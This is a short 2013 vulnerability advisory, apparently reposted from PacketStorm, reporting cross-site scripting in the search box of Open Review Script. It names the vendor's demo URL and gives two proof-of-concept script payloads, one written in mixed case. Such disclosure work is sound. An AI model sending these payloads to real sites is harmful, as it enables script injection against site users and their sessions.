Open Review Script Cross Site Scripting

Praetorian503 · February 19, 2013

Open Review Script suffers from a cross site scripting vulnerability.


#########################################################################
#     __              .__                            .__                #
#    |__|____    ____ |__| ______ ___________ _______|__| ____   ______ #
#    |  \__  \  /    \|  |/  ___//  ___/\__  \\_  __ \  |/ __ \ /  ___/ #
#    |  |/ __ \|   |  \  |\___ \ \___ \  / __ \|  | \/  \  ___/ \___ \  #
#/\__|  (____  /___|  /__/____  >____  >(____  /__|  |__|\___  >____  > #
#\______|    \/     \/        \/     \/      \/              \/     \/  #
#                                                 www.janissaries.org   #
##=====================================================================##  

 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 «««:»»»       Open Review Script-Cross Site Scripting (XSS) attacks       «««:»»»
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 ./Title Exploit : Open Review Script-Cross Site Scripting (XSS) attacks
 ./WebApps URL    :http://openreviewscript.org/
 ./WebApps Download   :http://openreviewscript.org/files/OpenReviewScript-v1.0.1.zip
 ./Author Exploit: [ TheMirkin ] [ th3mirkin@gmail.com.com ] [ All Janissaries ]
 ./Security Risk : [ High Level ]
 ./Category XPL  : [ WebApps]
 ./Time & Date   : 18.02.2013. 10:300 PM.
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 #################################################################################
 #
 #[~] Xss on Demo Site (Searchbox)
 #http://openreviewscript.org/scriptdemo/results/search
 #
 #
 #
 #
 #If you try; you may open demo site and xss attack code to Searchbox.
 #
 #  CAPS http://www.hizliresimyukle.com/images/2013/02/18/d9YPV.png
 # 
 #<ScRiPt >prompt(978524)</ScRiPt>
 #<script>alert('TheMirkin')</script>
 #
 #
 # xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx #
 # Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)
 #################################################################################

Source: PacketStorm

Sign In

Open Review Script Cross Site Scripting

Recommended Posts

Praetorian503

Join the conversation

Browse

Activity

Pages